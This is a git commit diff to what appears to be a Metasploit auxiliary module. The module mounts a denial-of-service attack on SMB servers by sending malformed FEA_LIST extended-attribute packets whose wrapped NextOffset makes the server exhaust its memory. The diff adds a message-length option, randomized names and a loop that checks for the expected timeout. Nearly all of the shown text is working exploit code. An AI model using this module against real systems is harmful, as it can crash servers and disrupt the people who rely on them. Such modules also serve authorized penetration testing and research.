New option added. Names now random. Dos check added

bug/bundler_fix
Boris 2013-08-31 13:18:22 +04:00
parent b3ec8f741f
commit 28ca62d60f
1 changed files with 22 additions and 15 deletions

View File

@ -27,8 +27,8 @@ class Metasploit3 < Msf::Auxiliary
[ 'uint8', 'Flags', 0x00 ],
[ 'uint8', 'NameLen', 0x07 ], # length of Name parameter minus trailing newline
[ 'uint16v', 'ValueLen', 0x04 ], #random valuelen with value
[ 'string', 'Name', 7, "dzlnly\x00" ], # Random string must end with '\0'
[ 'string', 'Value', 4, "\x00\x00\x00\x00" ]
[ 'string', 'Name', 7, Rex::Text.rand_text_alpha(6) + "\x00" ], # Random string must end with '\0'
[ 'string', 'Value', nil, "\x00\x00\x00\x00" ]
)
def initialize(info = {})
@ -55,25 +55,25 @@ class Metasploit3 < Msf::Auxiliary
Opt::RHOST(),
Opt::RPORT(445),
OptString.new('SMBShare', [true, 'Target share', '']),
OptString.new('MsgLen', [true, 'How soon a memory get exhausted depends on the length of that attribute', '1500']),
], self.class)
end
def get_fid
print_status("Try to find any files or directories for setting our attributes...")
files = self.simple.client.find_first("*")
path = ""
ok = self.simple.client.create(path)
ok = self.simple.client.create("/")
return ok['Payload'].v['FileID']
end
def mk_items_payload
item1 = FEA_LIST.make_struct
item2 = FEA_LIST.make_struct
item3 = FEA_LIST.make_struct #Some padding
item2.v['ValueLen'] = item1.v['ValueLen'] = datastore['MsgLen'].to_i
item2.v['Value'] = item1.v['Value'] = "\x00" * datastore['MsgLen'].to_i
ilen = item1.to_s.length
item1.v['NextOffset'] = ilen
item2 = FEA_LIST.make_struct
# Wrap offset to 0x00
item2.v['NextOffset'] = 0xffffffff - ilen + 1
item3 = FEA_LIST.make_struct #Some padding
return item1.to_s + item2.to_s + item3.to_s
end
def send_pkt
@ -86,14 +86,21 @@ class Metasploit3 < Msf::Auxiliary
self.simple.client.trans2(subcmd, trans.to_s, data.to_s, false)
end
def run
40.times do
connect()
smb_login()
self.simple.connect("\\\\#{rhost}\\#{datastore['SMBSHARE']}")
print_status('Sending malicious package...')
send_pkt
print_status('Seems like all ok')
begin
self.simple.client.create("")
print_status('Server Responce, DOS unsuccessfull')
rescue Timeout::Error
print_good('Server timed out, this is expected')
end
disconnect()
end
end
end